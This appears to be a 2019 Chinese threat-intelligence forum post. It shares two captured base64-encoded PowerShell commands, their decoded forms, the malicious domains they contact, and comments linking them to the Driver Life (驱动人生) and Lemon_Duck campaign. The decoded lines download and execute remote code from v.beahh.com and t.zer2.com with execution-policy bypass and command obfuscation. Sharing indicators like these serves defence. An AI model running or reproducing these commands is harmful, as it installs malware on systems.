入侵 远控服务器
入侵远控后门
匿名用户 2019-09-25 10:03:43 2042人浏览

某系统捕获到的:

powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

解密后:powershell -ep bypass -eIEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN) 





cmd /c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBPAGcAbQBBAFIAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AegBlAHIAMgAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AZQBiAF8AMgAwADEAOQAwADkAMAAzACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBNAEQANQBdADoAOgBDAHIAZQBhAHQAZQAoACkALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAG0AKQB8AGYAbwByAGUAYQBjAGgAewAkAHMAKwA9ACQAXwAuAFQAbwBTAHQAcgBpAG4AZwAoACcAeAAyACcAKQB9ADsAaQBmACgAJABzAC0AZQBxACcAZAA4ADEAMAA5AGMAZQBjADAAYQA1ADEANwAxADkAYgBlADYAZgA0ADEAMQBmADYANwBiADMAYgA3AGUAYwAxACcAKQB7AEkARQBYACgALQBqAG8AaQBuAFsAYwBoAGEAcgBbAF0AXQAkAG0AKQB9AA=="

解密后:cmd /c "set A=power& call %A%shell -ep bypass -e $Lemon_Duck='OgmAR';$y='http://t.zer2.com/v.js';$z=$y+'p'+'?eb_20190903';$m=(New-ObjectSystem.Net.WebClient).DownloadData($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'd8109cec0a51719be6f411f67b3b7ec1'){IEX(-join[char[]]$m)}"

域名(2) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
URL(1) < 1/1 >
t.zer2.com/v.js
Perfect 2019-12-11 10:26:19 回复
麻烦问下这个加密怎么解密呢
luolin6888 2019-09-30 23:09:01 回复
不懂 有没有师傅收徒啊 想学安全
xiqing_ao 2019-09-30 09:35:22 回复
v.beahh.com 驱动人生
root3306 2019-09-27 13:52:59 回复
驱动~人生
tanxing 2019-09-26 11:03:18 回复
驱动~人生
匿名用户 2019-09-25 10:05:49 回复
驱动~人生